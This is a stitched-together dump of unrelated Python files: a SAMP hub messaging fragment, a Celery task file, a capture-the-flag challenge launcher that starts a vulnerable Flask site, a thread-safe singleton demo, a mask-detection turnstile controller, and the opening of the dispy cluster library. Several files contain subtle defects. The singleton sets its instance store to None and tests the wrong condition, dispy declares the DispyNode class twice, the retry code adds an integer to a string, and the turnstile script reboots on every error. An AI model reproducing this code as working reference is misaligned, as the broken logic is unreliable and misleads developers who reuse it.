.format(private_key)) def _call_(self, sender_private_key, sender_public_id, recipient_public_id, msg_id, message): if sender_private_key not in self._private_keys: return try: log.debug("call {} from {} to {} ({})".format( msg_id.split(";;")[0], sender_public_id, recipient_public_id, message["samp.mtype"])) recipient_private_key = self._public_id_to_private_key(recipient_public_id) arg_params = (sender_public_id, msg_id, message) samp_methodName = "receiveCall" self._retry_method(recipient_private_key, recipient_public_id, samp_methodName, arg_params) except Exception as exc: warnings.warn("{} call {} from client {} to client {} failed " "[{},{}]".format(message["samp.mtype"], msg_id.split(";;")[0], sender_public_id, recipient_public_id, type(exc), exc), SAMPWarning) def _call_all(self, private_key, msg_tag, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if "samp.mtype" not in message: raise SAMPProxyError(3, "samp.mtype keyword is missing in " "message tagged as {}".format(msg_tag)) public_id = self._private_keys[private_key][0] msg_id = self._call_all_(private_key, public_id, msg_tag, message) return msg_id else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
.format(private_key)) def _call_all_(self, sender_private_key, sender_public_id, msg_tag, message): msg_id = {} msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"]) for mtype in msubs: if mtype in self._mtype2ids: for key in self._mtype2ids[mtype]: if key != sender_private_key: _msg_id = self._get_new_hub_msg_id(sender_public_id, msg_tag) receiver_public_id = self._private_keys[key][0] msg_id[receiver_public_id] = _msg_id self._launch_thread(target=self._call_, args=(sender_private_key, sender_public_id, receiver_public_id, _msg_id, message)) return msg_id def _call_and_wait(self, private_key, recipient_id, message, timeout): self._update_last_activity_time(private_key) if private_key in self._private_keys: timeout = int(timeout) now = time.time() response = {} msg_id = self._call(private_key, recipient_id, "samp::sync::call", message) self._sync_msg_ids_heap[msg_id] = None while self._is_running: if 0 < timeout <= time.time() - now: del(self._sync_msg_ids_heap[msg_id]) raise SAMPProxyError(1, "Timeout expired!") if self._sync_msg_ids_heap[msg_id] is not None: response = copy.deepcopy(self._sync_msg_ids_heap[msg_id]) del(self._sync_msg_ids_heap[msg_id]) break time.sleep(0.01) return response else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _reply(self, private_key, msg_id, response): """ The main method that gets called for replying. This starts up an asynchronous reply thread and returns. """ self._update_last_activity_time(private_key) if private_key in self._private_keys: self._launch_thread(target=self._reply_, args=(private_key, msg_id, response)) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." 
.format(private_key)) return {} def _reply_(self, responder_private_key, msg_id, response): if responder_private_key not in self._private_keys or not msg_id: return responder_public_id = self._private_keys[responder_private_key][0] counter, hub_public_id, recipient_public_id, recipient_msg_tag = msg_id.split(";;", 3) try: log.debug("reply {} from {} to {}".format( counter, responder_public_id, recipient_public_id)) if recipient_msg_tag == "samp::sync::call": if msg_id in self._sync_msg_ids_heap.keys(): self._sync_msg_ids_heap[msg_id] = response else: recipient_private_key = self._public_id_to_private_key(recipient_public_id) arg_params = (responder_public_id, recipient_msg_tag, response) samp_method_name = "receiveResponse" self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params) except Exception as exc: warnings.warn("{} reply from client {} to client {} failed [{}]" .format(recipient_msg_tag, responder_public_id, recipient_public_id, exc), SAMPWarning) def _retry_method(self, recipient_private_key, recipient_public_id, samp_method_name, arg_params): """ This method is used to retry a SAMP call several times. Parameters ---------- recipient_private_key The private key of the receiver of the call recipient_public_key The public key of the receiver of the call samp_method_name : str The name of the SAMP method to call arg_params : tuple Any additional arguments to be passed to the SAMP method """ if recipient_private_key is None: raise SAMPHubError("Invalid client ID") from . 
import conf for attempt in range(conf.n_retries): if not self._is_running: time.sleep(0.01) continue try: if (self._web_profile and recipient_private_key in self._web_profile_callbacks): # Web Profile callback = {"samp.methodName": samp_method_name, "samp.params": arg_params} self._web_profile_callbacks[recipient_private_key].put(callback) else: # Standard Profile hub = self._xmlrpc_endpoints[recipient_public_id][1] getattr(hub.samp.client, samp_method_name)(recipient_private_key, *arg_params) except xmlrpc.Fault as exc: log.debug("{} XML-RPC endpoint error (attempt {}): {}" .format(recipient_public_id, attempt + 1, exc.faultString)) time.sleep(0.01) else: return # If we are here, then the above attempts failed error_message = samp_method_name + " failed after " + conf.n_retries + " attempts" raise SAMPHubError(error_message) def _public_id_to_private_key(self, public_id): for private_key in self._private_keys.keys(): if self._private_keys[private_key][0] == public_id: return private_key return None def _get_new_hub_msg_id(self, sender_public_id, sender_msg_id): with self._thread_lock: self._hub_msg_id_counter += 1 return "msg#{};;{};;{};;{}".format(self._hub_msg_id_counter, self._hub_public_id, sender_public_id, sender_msg_id) def _update_last_activity_time(self, private_key=None): with self._thread_lock: self._last_activity_time = time.time() if private_key is not None: self._client_activity_time[private_key] = time.time() def _receive_notification(self, private_key, sender_id, message): return "" def _receive_call(self, private_key, sender_id, msg_id, message): if private_key == self._hub_private_key: if "samp.mtype" in message and message["samp.mtype"] == "samp.app.ping": self._reply(self._hub_private_key, msg_id, {"samp.status": SAMP_STATUS_OK, "samp.result": {}}) elif ("samp.mtype" in message and (message["samp.mtype"] == "x-samp.query.by-meta" or message["samp.mtype"] == "samp.query.by-meta")): ids_list = 
self._query_by_metadata(message["samp.params"]["key"], message["samp.params"]["value"]) self._reply(self._hub_private_key, msg_id, {"samp.status": SAMP_STATUS_OK, "samp.result": {"ids": ids_list}}) return "" else: return "" def _receive_response(self, private_key, responder_id, msg_tag, response): return "" def _web_profile_register(self, identity_info, client_address=("unknown", 0), origin="unknown"): self._update_last_activity_time() if not client_address[0] in ["localhost", "127.0.0.1"]: raise SAMPProxyError(403, "Request of registration rejected " "by the Hub.") if not origin: origin = "unknown" if isinstance(identity_info, dict): # an old version of the protocol provided just a string with the app name if "samp.name" not in identity_info: raise SAMPProxyError(403, "Request of registration rejected " "by the Hub (application name not " "provided).") # Red semaphore for the other threads self._web_profile_requests_semaphore.put("wait") # Set the request to be displayed for the current thread self._web_profile_requests_queue.put((identity_info, client_address, origin)) # Get the popup dialogue response response = self._web_profile_requests_result.get() # OK, semaphore green self._web_profile_requests_semaphore.get() if response: register_map = self._perform_standard_register() translator_url = ("http://localhost:{}/translator/{}?ref=" .format(self._web_port, register_map["samp.private-key"])) register_map["samp.url-translator"] = translator_url self._web_profile_server.add_client(register_map["samp.private-key"]) return register_map else: raise SAMPProxyError(403, "Request of registration rejected by " "the user.") def _web_profile_allowReverseCallbacks(self, private_key, allow): self._update_last_activity_time() if private_key in self._private_keys: if allow == "0": if private_key in self._web_profile_callbacks: del self._web_profile_callbacks[private_key] else: self._web_profile_callbacks[private_key] = queue.Queue() else: raise SAMPProxyError(5, "Private-key 
{} expired or invalid." .format(private_key)) return "" def _web_profile_pullCallbacks(self, private_key, timeout_secs): self._update_last_activity_time() if private_key in self._private_keys: callback = [] callback_queue = self._web_profile_callbacks[private_key] try: while self._is_running: item_queued = callback_queue.get_nowait() callback.append(item_queued) except queue.Empty: pass return callback else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) class WebProfileDialog: """ A base class to make writing Web Profile GUI consent dialogs easier. The concrete class must: 1) Poll ``handle_queue`` periodically, using the timer services of the GUI's event loop. This function will call ``self.show_dialog`` when a request requires authorization. ``self.show_dialog`` will be given the arguments: - ``samp_name``: The name of the application making the request. - ``details``: A dictionary of details about the client making the request. - ``client``: A hostname, port pair containing the client address. - ``origin``: A string containing the origin of the request. 2) Call ``consent`` or ``reject`` based on the user's response to the dialog. """ def handle_queue(self): try: request = self.queue_request.get_nowait() except queue.Empty: # queue is set but empty pass except AttributeError: # queue has not been set yet pass else: if isinstance(request[0], str): # To support the old protocol version samp_name = request[0] else: samp_name = request[0]["samp.name"] self.show_dialog(samp_name, request[0], request[1], request[2]) def consent(self): self.queue_result.put(True) def reject(self): self.queue_result.put(False)
tasks.py
# encoding=utf-8 __author__ = 'wdx' import os print os.path.dirname(__file__) from celery import Celery from msg_handler import MsgHandler from core.processor_watcher import ProcessorWatcher from watchdog.observers import Observer from threading import Thread app = Celery('tasks',backend='amqp', broker='amqp://') msg_handler = MsgHandler() msg_queue = msg_handler.get_msg_queue()#得到消息队列 msg_handler_thread = Thread(target=msg_handler.process_msg) msg_handler_thread.start() # 打开一个线程,等待(block)注册或处理事件 event_handler = ProcessorWatcher(queue=msg_queue) observer = Observer() observer.schedule(event_handler, event_handler.path, recursive=True) observer.start() #监控processor中文件的变化 ''' 对oplog 的事件处理 ''' @app.task def oplog(msg): #传入oplog消息 msg_handler.notify_listeners(msg) print 'oplog'
main.py
# Content from http://www.eveandersson.com/pi/poetry/
from os import path
from random import choice
from vulnerable_flask.website import start_app
from multiprocessing import Process

# Declare paths to the files
PATH = path.normpath(path.dirname(__file__))
FLAG_PATH = path.join(PATH, "secrets", "flag.txt")

# Get the challenge name (top-level package name of this module)
NAME = __name__.split(".")[0]


def main(server, data):
    """Handle the ``!<challenge>`` chat command.

    Parameters:
        server: object exposing a ``cache`` dict and a ``send(message)`` method.
        data:   command tokens; ``data[0]`` is the command itself, an optional
                ``data[1]`` is either ``"help"`` or an answer attempt.
    """
    # Get the number of elements passed in the command
    switch = len(data)

    # Bare command: (re)generate the flag and make sure the site is up
    if switch == 1:
        # Generate the flag
        flag = generate_flag(32)

        # Inform what flag was generated
        print(NAME + ": Generated following flag: " + flag)

        # Save the flag to the file
        save_flag(flag)

        # Avoid running server twice
        if NAME + "_flag" not in server.cache.keys():
            # Inform that a website is being created
            print(NAME + ": Creating website...")

            # Run the server
            Process(target=start_app).start()

            # Inform when it was loaded
            print(NAME + ": Website created!")

            # Send the message that a website was created
            message = "Website started!" + "\r\n"
        else:
            # Inform the website is already up
            message = "Website already running!" + "\r\n"

        # Add the flag to cache, to check the answer later
        server.cache[NAME + "_flag"] = flag

    # If the help argument was included
    elif switch == 2 and data[1] == "help":
        # Build the help message
        message = "!" + NAME + " - starts the vulnerable flask challenge" + "\r\n" + \
                  "!" + NAME + " <answer> - checks the answer of the challenge" + "\r\n"

    # If any non-help arguments were included
    else:
        # Retrieve the answer
        answer = data[1]

        # Check if the flag was actually generated before
        if NAME + "_flag" in server.cache.keys():
            # Inform what answer was received
            print(NAME + ": Received following answer: " + answer)

            # Check if the answer is correct
            if answer == server.cache.get(NAME + "_flag"):
                # Send the "correct!" message if the answer matches the flag
                message = "Correct! Well done!" + "\r\n"
            else:
                # Send the "incorrect!" message if the answer doesn't match the flag
                message = "Incorrect! Try again!" + "\r\n"
        else:
            # Inform the user that the challenge hasn't been executed yet
            message = "No website was ran yet! Type !" + NAME + " before sending an answer to it." + "\r\n"

    # Send the prepared message to the client
    server.send(message)


def generate_flag(length):
    """Return *length* random characters drawn from a-z and underscore.

    NOTE(review): ``random.choice`` is not cryptographically secure; if the
    flag must be unguessable, use the ``secrets`` module instead.
    """
    return "".join(choice("abcdefghijklmnopqrstuvwxyz_") for _ in range(length))


def save_flag(flag):
    """Write *flag* to ``FLAG_PATH`` (UTF-8).

    Fix: the original called ``f.close()`` inside the ``with`` block under a
    "release the resources" comment — the context manager already closes the
    file, so the explicit call was redundant and the comment misleading.
    """
    with open(FLAG_PATH, "w", encoding="utf-8") as f:
        # Save the flag to the file; the context manager handles closing.
        f.write(flag)
single.py
__author__ = 'Aaron Yang' __email__ = 'byang971@usc.edu' __date__ = '8/20/2020 8:13 PM' import threading class Singleton(object): _lock = threading.Lock() _instances = None def __call__(cls, *args, **kwargs): with cls._lock: if not cls : instance = super().__call__(*args, **kwargs) cls._instances[cls] = instance return cls._instances[cls] def test_singleton(value: str) -> None: singleton = Singleton() print(singleton) for _ in range(33): obj = Singleton() print(obj) # for i in range(10): # process = threading.Thread(target=test_singleton, args=(i,)) # process.start()
totem.py
import cv2
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from datetime import datetime
import numpy as np
import threading
import serial
import time
import os

# Fullscreen kiosk window used by the totem display.
cv2.namedWindow('TotemUFSM', cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty('TotemUFSM', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)

# A larger BIAS makes the 'with mask' prediction more sensitive (use a number between 0 and 1).
BIAS = 0.2


def detect_and_predict_mask(frame, faceNet, maskNet):
    """Detect faces in ``frame`` with ``faceNet`` and classify each with ``maskNet``.

    Returns ``(locs, preds)``: bounding boxes ``(startX, startY, endX, endY)``
    and matching ``(mask, withoutMask)`` score pairs; both are empty when no
    face passes the confidence threshold.
    """
    # grab the dimensions of the frame and then construct a blob from it
    (h, w) = frame.shape[:2]
    blob = cv2.dnn.blobFromImage(frame, 1.0, (300, 300), (104.0, 177.0, 123.0))

    # pass the blob through the network and obtain the face detections
    faceNet.setInput(blob)
    detections = faceNet.forward()

    # initialize our list of faces, their corresponding locations,
    # and the list of predictions from our face mask network
    faces = list()
    locs = list()
    preds = list()

    # loop over the detections
    for i in range(0, detections.shape[2]):
        # extract the confidence (i.e., probability) associated with the detection
        confidence = detections[0, 0, i, 2]

        # filter out weak detections by ensuring the confidence is
        # greater than the minimum confidence
        if confidence > 0.6:
            # compute the (x, y)-coordinates of the bounding box for the object
            box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
            (startX, startY, endX, endY) = box.astype("int")

            # ensure the bounding boxes fall within the dimensions of the frame
            (startX, startY) = (max(0, startX), max(0, startY))
            (endX, endY) = (min(w - 1, endX), min(h - 1, endY))

            # extract the face ROI, convert it from BGR to RGB channel
            # ordering, resize it to 224x224, and preprocess it
            face = frame[startY:endY, startX:endX]
            if not face.size == 0:
                face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
                face = cv2.resize(face, (224, 224))
                face = img_to_array(face)
                face = preprocess_input(face)

                # add the face and bounding boxes to their respective lists
                faces.append(face)
                locs.append((startX, startY, endX, endY))

    # only make a predictions if at least one face was detected
    if len(faces) > 0:
        # for faster inference we'll make batch predictions on *all*
        # faces at the same time rather than one-by-one predictions
        # in the above for loop
        faces = np.array(faces, dtype="float32")
        preds = maskNet.predict(faces, batch_size=32)

    # return a 2-tuple of the face locations and their corresponding locations
    return locs, preds


def rotate_bound(image, angle):
    """Rotate ``image`` by ``angle`` degrees, growing the canvas so nothing is
    cropped. Returns a cv2.UMat."""
    # grab the dimensions of the image and then determine the center
    (h, w) = image.shape[:2]
    (cX, cY) = (w // 2, h // 2)

    # grab the rotation matrix (applying the negative of the
    # angle to rotate clockwise), then grab the sine and cosine
    # (i.e., the rotation components of the matrix)
    M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
    cos = np.abs(M[0, 0])
    sin = np.abs(M[0, 1])

    # compute the new bounding dimensions of the image
    nW = int((h * sin) + (w * cos))
    nH = int((h * cos) + (w * sin))

    # adjust the rotation matrix to take into account translation
    M[0, 2] += (nW / 2) - cX
    M[1, 2] += (nH / 2) - cY

    # perform the actual rotation and return the image
    image = cv2.UMat(image)
    return cv2.warpAffine(image, M, (nW, nH))


def compute_bound():
    """Background thread: keep the shared (locs, preds) updated from the
    latest ``compute_frame`` snapshot."""
    global locs, preds
    try:
        while not stop:
            if ret:
                # detect faces in the frame and determine if they are wearing a face mask or not
                (locs, preds) = detect_and_predict_mask(compute_frame, faceNet, maskNet)
    # NOTE(review): a bare except that reboots the machine hides every bug
    # (it even catches KeyboardInterrupt); consider logging the traceback first.
    except:
        os.system("reboot")


def gate_control():
    """Background thread: poll the Arduino and mark the gate closed again."""
    global gate
    try:
        while not stop:
            data = arduino.readline()
            # NOTE(review): readline() returns bytes, so ``data == 0`` is never
            # True and ``gate`` is never reset here — probably meant b'0' or an
            # int conversion; confirm against the Arduino protocol.
            if data == 0:
                gate = True
            time.sleep(0.1)
    except:
        os.system("reboot")


def draw_frame(image, c):
    """Draw corner brackets in color ``c`` around the image; returns a cv2.UMat."""
    ws = image.shape[0]
    hs = image.shape[1]
    image = cv2.UMat(image)
    image = cv2.line(image, (int(hs * 0.05), int(ws * 0.05)), (int(hs * 0.05), int(ws * 0.2)), c, 9)
    image = cv2.line(image, (int(hs * 0.05), int(ws * 0.05)), (int(hs * 0.2), int(ws * 0.05)), c, 9)
    image = cv2.line(image, (int(hs * 0.8), int(ws * 0.05)), (int(hs * 0.95), int(ws * 0.05)), c, 9)
    image = cv2.line(image, (int(hs * 0.95), int(ws * 0.05)), (int(hs * 0.95), int(ws * 0.2)), c, 9)
    image = cv2.line(image, (int(hs * 0.05), int(ws * 0.95)), (int(hs * 0.2), int(ws * 0.95)), c, 9)
    image = cv2.line(image, (int(hs * 0.05), int(ws * 0.8)), (int(hs * 0.05), int(ws * 0.95)), c, 9)
    image = cv2.line(image, (int(hs * 0.8), int(ws * 0.95)), (int(hs * 0.95), int(ws * 0.95)), c, 9)
    image = cv2.line(image, (int(hs * 0.95), int(ws * 0.8)), (int(hs * 0.95), int(ws * 0.95)), c, 9)
    return image


# stop running all processes
stop = False
gate = True  # False means the gate is in its opening process, True means it is already closed

# start arduino connection
# NOTE(review): port='USB0' looks wrong — on Linux serial devices are usually
# '/dev/ttyUSB0'; confirm on the target device.
arduino = serial.Serial(port='USB0', baudrate=115200, timeout=0.1)

# load our serialized face detector model from disk
print("[INFO] loading face detector model...")
prototxtPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
weightsPath = os.path.sep.join(["face_detector", "res10_300x300_ssd_iter_140000.caffemodel"])
faceNet = cv2.dnn.readNet(prototxtPath, weightsPath)

# load the face mask detector model from disk
print("[INFO] loading face mask detector model...")
maskNet = load_model("mask.model")

# camara capture (Jetson GStreamer pipeline)
cap = cv2.VideoCapture('nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1280, height=720, format=(string)NV12, framerate=(fraction)10/1 ! nvvidconv ! video/x-raw, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink', cv2.CAP_GSTREAMER)
#cap = cv2.VideoCapture(0)
assert cap.isOpened(), 'Cannot capture source'

ret, frame = cap.read()
frame_shape = frame.shape
frame = rotate_bound(frame, 90)
compute_frame = cv2.UMat.get(frame)  # plain ndarray copy consumed by the compute thread

# for text in output
t_size = cv2.getTextSize(" ", cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]
frames = fps = count = 0
locs = list()
preds = list()
c_fps = list()  # rolling window of instantaneous FPS samples
static_frame_time = time.time()
static_frame = False  # while True, the display is frozen on the current frame
post_delay_time = time.time()
post_delay = False  # cooldown after a freeze before acting on detections again
data = 0

cb = threading.Thread(target=compute_bound)
cb.setDaemon(True)  # NOTE(review): setDaemon() is deprecated; daemon=True is the modern spelling
cb.start()
gate_thread = threading.Thread(target=gate_control)
gate_thread.setDaemon(True)
gate_thread.start()

start = time.time()
while True:
    try:
        if static_frame:
            # keep the frozen frame for 3 seconds, then start the cooldown
            if time.time() - static_frame_time >= 3:
                static_frame = False
                post_delay_time = time.time()
                post_delay = True
        else:
            ret, frame = cap.read()
            if not ret:
                pass
            color = (0, 0, 0)
            frame = rotate_bound(frame, 90)
            compute_frame = cv2.UMat.get(frame)  # hand the fresh frame to the compute thread

        # loop over the detected face locations and their corresponding locations
        if locs:
            # keep only the biggest detected face
            big_w = big_h = mask = withoutMask = startX = startY = 0
            for (box, pred) in zip(locs, preds):
                # unpack the bounding box and predictions
                (s_x, s_y, e_x, e_y) = box
                if big_h < e_y - s_y and big_w < e_x - s_x:
                    (startX, startY, endX, endY) = box
                    (mask, withoutMask) = pred
                    big_h = e_y - s_y
                    big_w = e_x - s_x

            # clamp coordinates that are outside of the image
            startX, startY = max(startX, 0), max(startY, 0)

            # determine the class label and color we'll use to draw the bounding box and text
            label = "Com Mascara" if mask + (mask*BIAS) > withoutMask - (withoutMask*BIAS) else "Sem Mascara"
            color = (0, 255, 0) if label == "Com Mascara" else (0, 0, 255)

            # only act once the face fills at least 25% of the frame (close enough)
            if big_h >= frame_shape[1] * 0.25 and big_w >= frame_shape[0] * 0.25:
                if not post_delay:
                    # opening the gate
                    if label == "Com Mascara" and gate:
                        # NOTE(review): bytes(0, 'utf-8') raises TypeError (with an
                        # encoding the first argument must be str); the reboot
                        # handler swallows it — probably meant b'0'. Confirm the
                        # Arduino command byte.
                        arduino.write(bytes(0, 'utf-8'))
                        static_frame = True
                        static_frame_time = time.time()
                    elif label == "Sem Mascara" and gate:
                        static_frame = True
                        static_frame_time = time.time()
                        cv2.putText(frame, "Por favor, utilize mascara!", (round(frame_shape[0]/25), round(frame_shape[1]/1.3)), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 3)
                else:
                    if time.time() - post_delay_time >= 3:
                        post_delay = False

            # include the probability in the label
            label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100)

            # display the label and bounding box rectangle on the output frame
            # (the trailing comma builds a throwaway tuple of the two calls — harmless)
            cv2.putText(frame, label, (startX, startY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2), cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)

        # draw the bounds of the image
        frame = cv2.UMat.get(frame)
        frame = draw_frame(frame, color)

        # CURRENT TIME SHOWING
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")

        # FPS PRINTING
        cv2.rectangle(frame, (0, 0), (175, 20), (0, 0, 0), -1)
        c_fps.append(1 / (time.time() - start))
        start = time.time()
        if len(c_fps) > 60:
            c_fps.pop(0)
        fps = sum(c_fps) / len(c_fps)
        cv2.putText(frame, current_time + " FPS : %3.2f" % fps, (0, t_size[1] + 2), cv2.FONT_HERSHEY_PLAIN, 1, [255, 255, 255], 1)

        # show the output frame
        cv2.imshow("TotemUFSM", frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            stop = True
            break
    except:
        os.system("reboot")

cap.release()
cv2.destroyAllWindows()
del faceNet
del maskNet
__init__.py
#!/usr/bin/python3

"""
dispy: Distribute computations among CPUs/cores on a single machine or
machines in cluster(s), grid, cloud etc. for parallel execution.
See http://dispy.sourceforge.net or https://pgiri.github.com/dispy for details.
"""

import os
import sys
import time
import socket
import inspect
import stat
import threading
import re
import ssl
import hashlib
import traceback
import shelve
import datetime
import atexit
import functools
import queue
import numbers
import collections
import struct
import errno

# netifaces is optional; without it, interface discovery (esp. IPv6) degrades
try:
    import netifaces
except:
    netifaces = None

import pycos
from pycos import Task, Pycos, AsyncSocket, Singleton, serialize, deserialize

__author__ = "Giridhar Pemmasani (pgiri@yahoo.com)"
__email__ = "pgiri@yahoo.com"
__copyright__ = "Copyright 2011, Giridhar Pemmasani"
__contributors__ = []
__maintainer__ = "Giridhar Pemmasani (pgiri@yahoo.com)"
__license__ = "Apache 2.0"
__url__ = "http://dispy.sourceforge.net"
__status__ = "Production"
__version__ = "4.8.7"

__all__ = ['logger', 'DispyJob', 'DispyNode', 'NodeAllocate', 'JobCluster', 'SharedJobCluster']

_dispy_version = __version__
# seconds allowed for each control message / socket exchange (see _Node.send)
MsgTimeout = 10


class DispyJob(object):
    """Job scheduled for execution with dispy.

    Once a job is scheduled (with a tuple of arguments), the __call__
    method can be invoked. This will wait until the job is
    complete. The result of the call (either the return value in case
    of python methods or the exit value in case of programs) will be
    returned; the result is also available as .result member if
    needed. In addition, any output, error, exception messages from
    the job will be available as .stdout, .stderr and .exception
    members. The time when the job was submitted for execution on a
    node will be available as .start_time and when the job results
    became available as .end_time.

    .id field is initially set to None and may be assigned by user to
    any value that is appropriate. This may be useful, for example, to
    distinguish one job from another.

    .status is read-only field; it is set to one of Created, Running,
    Finished, Cancelled, Terminated and ProvisionalResult, indicating
    current status of job. If job is created for SharedJobCluster,
    status is not updated to Running when job is actually running.

    .ip_addr is read-only field; it is set to IP address of node that
    executed job.

    .finish is a read-only event that is set when a job's results are
    available.
    """

    __slots__ = ('id', 'result', 'stdout', 'stderr', 'exception', 'submit_time', 'start_time',
                 'end_time', 'status', 'ip_addr', 'finish', '_args', '_kwargs', '_dispy_job_')

    # job lifecycle status values
    Created = 5
    Running = 6
    ProvisionalResult = 7
    # NB: Cancelled, Terminated and Finished status should have
    # values in that order, as PriorityQueue sorts data.
    # Thus, if a job with provisional result is already in the queue
    # and a job is finished, finished/terminated job is processed (in
    # callback) last.
    Cancelled = 8
    Terminated = 9
    Abandoned = 10
    Finished = 11

    def __init__(self, args, kwargs):
        # id can be assigned by user as appropriate (e.g., to distinguish jobs)
        self.id = None
        # rest are read-only
        self.result = None
        self.stdout = None
        self.stderr = None
        self.exception = None
        self.submit_time = time.time()
        self.start_time = None
        self.end_time = None
        self.status = DispyJob.Created
        self.ip_addr = None
        # set once the job's results are available (see __call__)
        self.finish = threading.Event()

        # rest are for dispy implementation only - these are opaque to clients
        self._args = args
        self._kwargs = kwargs
        self._dispy_job_ = None

    def __call__(self, clear=False):
        """Block until the job completes and return its result; optionally
        clear the finish event so the job can be waited on again."""
        self.finish.wait()
        if clear:
            self.finish.clear()
        return self.result

    def __lt__(self, other):
        # order by the internal _DispyJob_ (uid order); jobs whose internal
        # counterpart has been released sort after live ones
        if isinstance(self._dispy_job_, _DispyJob_):
            if isinstance(other._dispy_job_, _DispyJob_):
                return self._dispy_job_ < other._dispy_job_
            else:
                return True
        else:
            return False


class DispyNode(object):
    """A node's status is represented as available CPU as percent, memory in bytes and disk as
    bytes.
    This information is passed to NodeAllocate.allocate method and in cluster
    status callback with status DispyNode.AvailInfo.
    """

    def __init__(self, cpu, memory, disk, swap):
        # point-in-time availability measurements reported by a node
        self.cpu = cpu
        self.memory = memory
        self.disk = disk
        self.swap = swap


class DispyNode(object):
    """If 'cluster_status' is used when creating cluster, that function
    is called with an instance of this class as first argument.
    See 'cluster_status' in JobCluster below.
    """

    # status values distinct from DispyJob's (see DispyJob status constants)
    Initialized = DispyJob.Created - 1
    Closed = DispyJob.Finished + 5
    AvailInfo = Closed + 1

    def __init__(self, ip_addr, name, cpus):
        self.ip_addr = ip_addr
        self.name = name
        self.cpus = cpus
        self.avail_cpus = cpus
        self.busy = 0
        self.jobs_done = 0
        self.cpu_time = 0.0
        self.update_time = 0
        self.avail_info = None


class NodeAllocate(object):
    """Objects of this class describe if / how many CPUs in a node are
    allocated to clusters.

    Each element of 'nodes' passed to JobCluster or SharedJobCluster is an
    object of this class; if the element passed is a string (host name or IP
    address), a tuple (see documentation for details), it is converted to
    NodeAllocate object with '_parse_node_allocs' function.

    This class can be specialized (inherited) to override, for example,
    'allocate' method.
    """

    def __init__(self, host, port=None, cpus=0):
        self.ip_addr = _node_ipaddr(host)
        if not self.ip_addr:
            logger.warning('host "%s" is invalid', host)
            self.ip_rex = ''
        else:
            # turn the (possibly wildcard) address into a regular expression:
            # literal dots are escaped, '*' becomes '.*'
            self.ip_rex = self.ip_addr.replace('.', '\\.').replace('*', '.*')
        if port:
            try:
                port = int(port)
                assert port > 0
            except:
                logger.warning('port must be > 0 for node "%s"', host)
                port = None
        self.port = port
        if cpus:
            try:
                cpus = int(cpus)
            except:
                logger.warning('Invalid cpus for "%s" ignored', host)
                cpus = 0
        self.cpus = cpus

    def allocate(self, cluster, ip_addr, name, cpus, avail_info=None, platform=''):
        """When a node is found, dispy calls this method with the cluster for
        which the node is being allocated, IP address, name and CPUs available
        on that node.
        This method should return a number indicating number of CPUs to use.
        If return value is 0, the node is not used for that cluster.
        """
        # the node qualifies only if its IP matches this allocation's pattern
        if re.match(self.ip_rex, ip_addr):
            if self.cpus > 0:
                # positive setting caps how many CPUs may be used
                cpus = min(cpus, self.cpus)
            elif (cpus + self.cpus) > 0:
                # negative setting reserves |self.cpus| CPUs (use the rest)
                cpus = cpus + self.cpus
            return cpus
        return 0


# a cluster's "status" function (not "cluster_status" callback)
# returns this structure; "nodes" is list of DispyNode objects and
# "jobs_pending" is number of jobs that are not done yet
ClusterStatus = collections.namedtuple('ClusterStatus', ['nodes', 'jobs_pending'])


def num_min(*args):
    # minimum over only the numeric arguments; None if there are none
    items = [arg for arg in args if isinstance(arg, numbers.Number)]
    if not items:
        return None
    return min(items)


def num_max(*args):
    # maximum over only the numeric arguments; None if there are none
    items = [arg for arg in args if isinstance(arg, numbers.Number)]
    if not items:
        return None
    return max(items)


def _same_file(tgt, xf):
    """Internal use only.
    """
    # TODO: compare checksum?
    # NOTE(review): returns True only on a full match; mismatches fall through
    # to an implicit None (falsy), and an os.stat failure returns False.
    try:
        stat_buf = os.stat(tgt)
        if stat_buf.st_size == xf.stat_buf.st_size and \
           abs(stat_buf.st_mtime - xf.stat_buf.st_mtime) <= 1 and \
           stat.S_IMODE(stat_buf.st_mode) == stat.S_IMODE(xf.stat_buf.st_mode):
            return True
    except:
        return False


def auth_code(secret, sign):
    # shared-secret handshake token for the dispy wire protocol; both ends
    # must compute the same SHA-1 digest of secret+sign
    return hashlib.sha1((secret + sign).encode()).hexdigest().encode()


def _node_ipaddr(node):
    """Internal use only.
    """
    if not node:
        return None
    if node.find('*') >= 0:
        # wildcard pattern is passed through unresolved
        return node
    try:
        ip_addr = socket.getaddrinfo(node, None)[0]
        family = ip_addr[0]
        ip_addr = ip_addr[4][0]
        if family == socket.AF_INET6:
            # canonicalize so different platforms resolve to same string
            ip_addr = re.sub(r'^0+', '', ip_addr)
            ip_addr = re.sub(r':0+', ':', ip_addr)
            ip_addr = re.sub(r'::+', '::', ip_addr)
            # TODO: handle dot notation in last 4 bytes?
        return ip_addr
    except:
        return None


def _parse_node_allocs(nodes):
    """Internal use only.
